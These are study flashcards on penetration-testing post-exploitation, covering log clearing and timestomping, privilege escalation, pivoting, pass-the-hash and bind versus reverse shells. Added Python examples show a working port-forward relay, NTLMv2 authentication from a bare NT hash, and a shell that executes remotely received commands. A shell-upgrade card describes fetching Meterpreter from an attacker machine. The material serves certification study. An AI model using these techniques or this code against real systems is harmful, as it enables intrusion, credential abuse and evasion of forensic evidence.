3.7 Attacks and Exploits Flashcards
Given a scenario, perform post-exploitation techniques.
How can you cover your tracks?
You can cover your tracks by clearing or selectively altering log entries, modifying file timestamps (timestomping), removing shell or command history, or shredding files so they cannot be recovered. Selective edits are quieter than wiping a whole log: clearing the Windows Security log, for example, itself generates event ID 1102, which defenders commonly alert on.
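The "modifying timestamps" technique, and the catch a forensic examiner relies on, as an added example that is not part of the original flashcards. It assumes a POSIX filesystem, where st_ctime is the inode change time, and uses a constructed file in a temporary directory.

```python
import os
import tempfile

# Added example, not from the original flashcards. Assumption: POSIX semantics,
# where os.stat().st_ctime is the inode change time the kernel maintains itself.

def timestomp(path, reference_epoch):
    """Set atime and mtime of `path` to `reference_epoch`, i.e. what
    `touch -t` / `touch -r` does. Returns (mtime, ctime) as seen afterwards."""
    os.utime(path, (reference_epoch, reference_epoch))
    st = os.stat(path)
    return st.st_mtime, st.st_ctime

def demo():
    """Drop a constructed file, backdate it to epoch 1_000_000_000 (2001-09-09)
    and report whether the timestamps are internally consistent."""
    old = 1_000_000_000
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "dropped.bin")
        with open(path, "wb") as f:
            f.write(b"constructed placeholder content")
        mtime, ctime = timestomp(path, old)
    # utime() is itself a metadata change, so the kernel sets ctime to "now".
    # ctime cannot be set through utime(), so mtime older than ctime by years
    # is exactly the inconsistency a filesystem timeline tool flags.
    return {"mtime": mtime, "ctime": ctime, "inconsistent": ctime > mtime + 86400}

if __name__ == "__main__":
    print(demo())
```

The point to take from the run: the backdated mtime looks right, but ctime still says when you touched the file, so timestomping alone does not remove the evidence, it just moves it.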
What does the structure of Active Directory (AD) look like?
Forest (one or more trees that share a schema, configuration and global catalog; the forest is the security boundary)
↓
Tree (one or more domains in a contiguous DNS namespace, e.g. corp.example.com with child domain eu.corp.example.com)
↓
Domain (a partition of the directory with its own domain controllers, accounts and policies)
↓
Organizational Units (OUs) are used within a domain to group similar objects such as users, groups, computers and other OUs; they are the unit for delegating administration and linking Group Policy, which keeps the number of domains small
What is Horizontal Privilege Escalation?
Horizontal PrivEsc is obtaining access to another account at the same privilege level as the one currently in use but with different access or permissions (for example another regular user's mailbox or file shares). This approach has great potential for information gathering without raising suspicion, since the activity looks like normal user behaviour.
What is Vertical Privilege Escalation?
Vertical PrivEsc is obtaining access to an account with higher privilege than the one we currently have (local administrator, root or a domain admin, for example) in order to reach resources that the regular user does not have permission for.
How can you upgrade a restrictive shell?
In Windows, you could write the FTP commands (open, user, binary, get, bye) to a text file, run them non-interactively with ftp -s:script.txt to download Meterpreter from the attacker machine, and then execute it. In Linux, depending on distribution and implementation, it can be as simple as launching bash in interactive mode (bash -i) or spawning a pseudo-terminal, e.g. python -c 'import pty; pty.spawn("/bin/bash")', which gives you a prompt, job control and tab completion.
What is BloodHoundAD?
BloodHoundAD is an attack-path mapping tool for Active Directory (AD), not an exploitation tool: it ingests data collected from the domain by its SharpHound collector, stores it as a graph and lets you quickly explore AD trust relationships, abusable rights on AD objects, security group memberships, SQL admin links and more, so you can find the shortest path from a compromised account to a target such as Domain Admins.
What is the difference between Pivoting and Lateral Movement?
Pivoting and Lateral Movement are related but not the same. In Lateral Movement, you jump from one host to the next in search of further access or vulnerabilities to exploit, typically over remote access or remote management services (RDP, SSH, WinRM, SMB/PsExec) using credentials you have already obtained. When you Pivot, you use one compromised host (the pivot) as a relay so that your tools can reach hosts and networks that are not routable from your attack machine. You can do this with port forwarding, VPN pivoting, SSH pivoting (ssh -L, -R or -D) or by modifying routing tables so that traffic for the internal network is sent through the pivot.
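A minimal TCP port forward of the kind a pivot host runs, as an added example that is not from the original flashcards. Everything listens on 127.0.0.1 and the "internal" service is a constructed echo server, so it runs offline; in a real engagement the target address would be one that only the pivot can reach.

```python
import socket
import threading

# Added example, not from the original flashcards. The internal service and the
# addresses are constructed; the relay logic is the generic port-forward a pivot runs.

def _listen(host="127.0.0.1", port=0):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))  # port 0: let the OS pick a free port
    srv.listen(5)
    return srv

def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then pass the half-close along."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def start_pivot(target_host, target_port, listen_host="127.0.0.1", listen_port=0):
    """Runs on the compromised pivot: every connection accepted on the listen
    side is relayed to (target_host, target_port). Returns the listening socket;
    close it to stop accepting new connections."""
    srv = _listen(listen_host, listen_port)

    def serve():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:  # listener closed
                return
            try:
                upstream = socket.create_connection((target_host, target_port))
            except OSError:
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv

def _echo_service(srv):
    """Constructed stand-in for an internal service (think: an admin interface)."""
    conn, _ = srv.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data)

def demo(message=b"GET /admin HTTP/1.0\r\n\r\n"):
    """Attacker -> pivot listener -> internal echo service, and back again."""
    internal = _listen()
    threading.Thread(target=_echo_service, args=(internal,), daemon=True).start()
    pivot = start_pivot("127.0.0.1", internal.getsockname()[1])
    chunks = []
    with socket.create_connection(pivot.getsockname()) as s:
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)  # we are done sending; wait for the reply
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    pivot.close()
    internal.close()
    return b"".join(chunks)

if __name__ == "__main__":
    print(demo())
```

The attacker only ever talks to the pivot's listening port; the internal service sees a connection from the pivot's address, which is also why pivot traffic stands out in the internal host's logs.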
What is a pass the hash attack?
A pass the hash attack is when you log on to a target OS or application by providing the username and the hash of the password (on Windows, the NT hash) rather than the password itself. It works because NTLM authentication proves possession of the hash, not of the cleartext, so the hash is password-equivalent. You obtain hashes by inducing the OS or application to dump them from RAM (the LSASS process), the Windows Registry (the SAM and SECURITY hives) or a credentials file such as NTDS.dit on a domain controller.
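Why the hash is enough, shown in code, as an added example that is not part of the original flashcards. The NT hash is MD4 over the UTF-16LE password, and the NTLMv2 response is an HMAC chain keyed only by that hash (MS-NLMP 3.3.2), so a function computing the response has no password parameter at all. MD4 is implemented in pure Python because hashlib's md4 is often disabled (OpenSSL legacy provider). The user, domain, server challenge and client blob are constructed; the NT hash of "password" used in demo() is the published test value.

```python
import hmac
import hashlib
import struct

# Added example, not from the original flashcards. MD4 per RFC 1320; NTLMv2 per
# MS-NLMP 3.3.2. All exchange values in demo() are constructed.

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed only because the NT hash is defined over it."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """NTOWF: MD4 over the UTF-16LE password. This is the value that gets 'passed'."""
    return md4(password.encode("utf-16le"))

def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes):
    """NTLMv2 proof and session base key from the NT hash alone.
    Note the signature: there is no password parameter. A client holding only
    `nt` authenticates exactly as one holding the password would."""
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    nt_proof = hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()
    session_base_key = hmac.new(response_key, nt_proof, hashlib.md5).digest()
    return nt_proof + blob, session_base_key

def demo() -> bool:
    """Same server challenge answered once with the password and once with only
    the dumped hash; True means the server could not tell the two apart."""
    user, domain = "alice", "CORP"                               # constructed
    server_challenge = bytes.fromhex("0123456789abcdef")         # constructed CHALLENGE_MESSAGE value
    client_challenge = bytes.fromhex("aaaaaaaaaaaaaaaa")         # constructed
    timestamp = struct.pack("<Q", 0x01D8D0B000000000)            # constructed FILETIME-style value
    target_info = b""                                            # AV_PAIRs omitted in this constructed blob
    blob = (b"\x01\x01" + b"\x00" * 6 + timestamp + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    from_password = ntlmv2_response(nt_hash("password"), user, domain, server_challenge, blob)
    dumped = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")   # NT hash of "password" as a dump tool prints it
    from_hash = ntlmv2_response(dumped, user, domain, server_challenge, blob)
    return from_password == from_hash

if __name__ == "__main__":
    print(nt_hash("password").hex(), demo())
```

The same property is what makes NT hashes worth protecting like passwords (Credential Guard, disabling NTLM where possible), and what makes a dumped hash useful long after the password is forgotten.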
What are some common methods for PrivEsc in Windows?
-Target logins and/or dump passwords
-Compromise applications to gain access to a workstation and/or escalate privileges
-Bypass local UAC
-Find processes with weak controls and inject malicious code
-Search for sensitive information in shared folders
-DLL hijacking
-Search for missing patches and misconfigurations
What are some common methods for PrivEsc in Linux?
-Obtain a copy of the passwd/shadow files to crack password hashes offline
-Find processes with weak controls and inject malicious code
-Compromise end user applications
-Locate applications you can run as root (sudo -l, SUID/SGID binaries)
-Locate and compromise services owned by root
-Search for sensitive information in shared folders
-Find exploits that target the kernel and privileged services
-Try upgrading your shell
-Exploit badly configured cron jobs (root jobs running writable scripts or relying on a writable PATH) to gain root access
-Search for missing patches and misconfigurations
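The "badly configured cron jobs" item from the list above, written as a small auditor, as an added example that is not from the original flashcards. It parses system-crontab syntax (five time fields or an @keyword, then a user, then the command) and flags any absolute path in a command that a low-privileged user could overwrite. The crontab text and the files in demo() are constructed in a temporary directory; the function names are this example's own.

```python
import os
import stat
import tempfile

# Added example, not from the original flashcards. Checks the two classic cron
# privesc conditions: a root job runs a world-writable script, or a script that
# sits in a world-writable directory without the sticky bit (so it can be replaced).

def cron_targets(crontab_text):
    """Yield (user, path) for every absolute path referenced by a crontab command."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value
        fields = line.split()
        if fields[0].startswith("@"):
            user, command = fields[1], fields[2:]        # @reboot user command
        elif len(fields) >= 7:
            user, command = fields[5], fields[6:]        # m h dom mon dow user command
        else:
            continue  # user crontabs carry no user field; not handled here
        for tok in command:
            if tok.startswith("/"):
                yield user, tok

def writable_by_others(path):
    """Return a reason string if `path` or its directory is world-writable, else None."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None  # missing target is a different finding (creatable path), not covered here
    if st.st_mode & stat.S_IWOTH:
        return "world-writable file"
    parent = os.stat(os.path.dirname(path) or "/").st_mode
    if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
        return "world-writable directory without sticky bit (file can be replaced)"
    return None

def find_weak_cron_jobs(crontab_text):
    """Return [(user, path, reason)] for jobs whose code a low-privileged user could change."""
    findings = []
    for user, path in cron_targets(crontab_text):
        reason = writable_by_others(path)
        if reason:
            findings.append((user, path, reason))
    return findings

def demo():
    """Constructed /etc/crontab: one safe job, one world-writable script, one script in
    a world-writable directory, one missing script. Paths are reduced to basenames."""
    with tempfile.TemporaryDirectory() as d:
        drop = os.path.join(d, "drop")
        os.mkdir(drop)
        files = {
            os.path.join(d, "rotate.sh"): 0o755,   # fine
            os.path.join(d, "backup.sh"): 0o777,   # anyone can edit what root will run
            os.path.join(drop, "job.sh"): 0o755,   # file is fine, but its directory is 0o777
        }
        for path, mode in files.items():
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        os.chmod(drop, 0o777)
        crontab = f"""
SHELL=/bin/sh
# m h dom mon dow user command
17 *    * * *   root    /bin/sh {d}/rotate.sh
0  2    * * *   root    /bin/sh {d}/backup.sh --full
@reboot         root    {drop}/job.sh
*/5 *   * * *   root    /opt/missing/cleanup.sh
"""
        findings = find_weak_cron_jobs(crontab)
    return [(u, os.path.basename(p), r) for u, p, r in findings]

if __name__ == "__main__":
    for finding in demo():
        print(*finding)
```

On a real host you would feed it /etc/crontab and the files under /etc/cron.d; the same mode checks apply to anything those jobs source or exec, which is why the auditor looks at every absolute path in the command rather than only the first token.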
What is the difference between a Bind shell and a Reverse shell?
A Bind shell is established when the target system “binds” its shell to a local network port and waits. The attack machine then uses Netcat (or a similar tool) to connect to that port and obtain the shell. This needs an inbound path to the target, which firewalls and NAT frequently block.
A Reverse shell is established when the target machine connects out to an attack machine that is listening on a specific port. You start the listener on the attack machine first, then launch the connection on the target; the listener accepts the incoming connection and you get a shell on the target system. Because the connection is outbound from the target, it usually passes egress rules that would stop a bind shell, which is why reverse shells are the more common choice.
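Both topologies side by side, as an added example that is not from the original flashcards. The target and attacker code is identical except for who listens and who connects, which is the whole difference between the two. Everything runs on 127.0.0.1, one command per connection, and the "target" side runs the received line through the local shell, so treat it as a constructed demonstration rather than a payload.

```python
import socket
import subprocess
import threading

# Added example, not from the original flashcards. Constructed localhost demo:
# the only thing that changes between the two functions is which side listens.

def _listen(host="127.0.0.1", port=0):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))  # port 0: let the OS pick a free port
    srv.listen(1)
    return srv

def _target_shell(conn):
    """Target side, the same for both shells: read one command line, run it,
    send back stdout and stderr, close."""
    with conn:
        buf = b""
        while b"\n" not in buf:
            chunk = conn.recv(4096)
            if not chunk:
                break
            buf += chunk
        cmd = buf.split(b"\n", 1)[0].decode().strip()
        result = subprocess.run(cmd, shell=True, capture_output=True)
        conn.sendall(result.stdout + result.stderr)

def _attacker_session(sock, cmd):
    """Attacker side, the same for both shells: send a command, collect the output."""
    with sock:
        sock.sendall(cmd.encode() + b"\n")
        sock.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode().strip()

def bind_shell_demo(cmd="echo bind-shell-ok"):
    """Bind shell: the TARGET listens, the attacker connects in (needs an inbound path)."""
    target_listener = _listen()  # target binds its shell to a port and waits
    threading.Thread(target=lambda: _target_shell(target_listener.accept()[0]),
                     daemon=True).start()
    out = _attacker_session(socket.create_connection(target_listener.getsockname()), cmd)
    target_listener.close()
    return out

def reverse_shell_demo(cmd="echo reverse-shell-ok"):
    """Reverse shell: the ATTACKER listens first, the target connects out (needs only egress)."""
    attacker_listener = _listen()  # listener must be up before the target calls back
    threading.Thread(target=lambda: _target_shell(
        socket.create_connection(attacker_listener.getsockname())), daemon=True).start()
    conn, _ = attacker_listener.accept()
    out = _attacker_session(conn, cmd)
    attacker_listener.close()
    return out

if __name__ == "__main__":
    print(bind_shell_demo())
    print(reverse_shell_demo())
```

Read the two demo functions against each other: the shell code and the attacker session are shared, and only the listen/connect roles swap. That swap is what decides whether a firewall's inbound or outbound rules are the ones that matter.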